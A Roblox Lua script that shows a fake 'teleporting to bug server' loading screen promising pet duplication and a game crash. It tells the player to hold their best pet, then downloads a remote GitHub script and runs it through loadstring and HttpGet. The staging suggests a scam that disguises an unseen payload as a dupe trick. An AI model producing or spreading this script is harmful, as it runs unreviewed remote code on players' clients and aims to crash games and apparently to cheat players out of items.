local player = game.Players.LocalPlayer
local gui = Instance.new("ScreenGui")
gui.Name = "BugTeleportUI"
gui.ResetOnSpawn = false
gui.Parent = player:WaitForChild("PlayerGui")

-- Frame
local frame = Instance.new("Frame", gui)
frame.Size = UDim2.new(0.5, 0, 0.25, 0)
frame.Position = UDim2.new(0.25, 0, 0.4, 0)
frame.BackgroundColor3 = Color3.fromRGB(20, 20, 30)
frame.BorderSizePixel = 0
frame.BackgroundTransparency = 0.1

-- Title
local title = Instance.new("TextLabel", frame)
title.Size = UDim2.new(1, 0, 0.3, 0)
title.Position = UDim2.new(0, 0, 0, 0)
title.Text = "Teleporting to bug server...."
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.BackgroundTransparency = 1
title.Font = Enum.Font.SourceSansBold
title.TextScaled = true

-- Bar Background
local barBg = Instance.new("Frame", frame)
barBg.Size = UDim2.new(0.9, 0, 0.2, 0)
barBg.Position = UDim2.new(0.05, 0, 0.4, 0)
barBg.BackgroundColor3 = Color3.fromRGB(50, 50, 60)
barBg.BorderSizePixel = 0
barBg.ClipsDescendants = true

-- Bar Fill
local barFill = Instance.new("Frame", barBg)
barFill.Size = UDim2.new(0, 0, 1, 0)
barFill.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
barFill.BorderSizePixel = 0

-- Loading Text
local loading = Instance.new("TextLabel", frame)
loading.Size = UDim2.new(1, 0, 0.2, 0)
loading.Position = UDim2.new(0, 0, 0.65, 0)
loading.Text = "LOADING..."
loading.TextColor3 = Color3.fromRGB(0, 255, 255)
loading.BackgroundTransparency = 1
loading.Font = Enum.Font.SourceSans
loading.TextScaled = true

-- Footer
local footer = Instance.new("TextLabel", frame)
footer.Size = UDim2.new(1, 0, 0.2, 0)
footer.Position = UDim2.new(0, 0, 0.82, 0)
footer.Text = "WAITING TILL THE GAME CRASH"
footer.TextColor3 = Color3.fromRGB(255, 100, 100)
footer.BackgroundTransparency = 1
footer.Font = Enum.Font.SourceSans
footer.TextScaled = true

-- Optional Pumpkin Icon
local pumpkin = Instance.new("ImageLabel", frame)
pumpkin.Size = UDim2.new(0.25, 0, 0.5, 0)
pumpkin.Position = UDim2.new(0.75, 0, -0.3, 0)
pumpkin.Image = "rbxassetid://11799845832"
pumpkin.BackgroundTransparency = 1

-- Function to animate progress bar
local function animateBar(duration, color)
	barFill.Size = UDim2.new(0, 0, 1, 0)
	barFill.BackgroundColor3 = color or Color3.fromRGB(0, 170, 255)
	local steps = 100
	local interval = duration / steps
	for i = 1, steps do
		barFill.Size = UDim2.new(i / steps, 0, 1, 0)
		wait(interval)
	end
end

-- Run full sequence
task.spawn(function()
	-- PHASE 1: 30s Load
	animateBar(30, Color3.fromRGB(0, 170, 255))
	loading.Text = "FAILED"
	footer.Text = "don't have good pets to dupe 😔"
	wait(2)

	-- PHASE 2: 10s Fast Load
	animateBar(10, Color3.fromRGB(255, 170, 0))
	loading.Text = "HOLD YOUR BEST PET!"
	footer.Text = ""
	wait(5)

	-- PHASE 3: Final Trigger
	loading.Text = "CRASHING THE GAME!"
	footer.Text = ""

	wait(2)

	-- Execute GitHub script
	local success, err = pcall(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/ReiX31/Gag-crasher.2/refs/heads/main/RYUK-GAMECRASHER"))()
	end)

	if not success then
		footer.Text = "FAILED TO EXECUTE"
		warn("Error: " .. tostring(err))
	end
end)
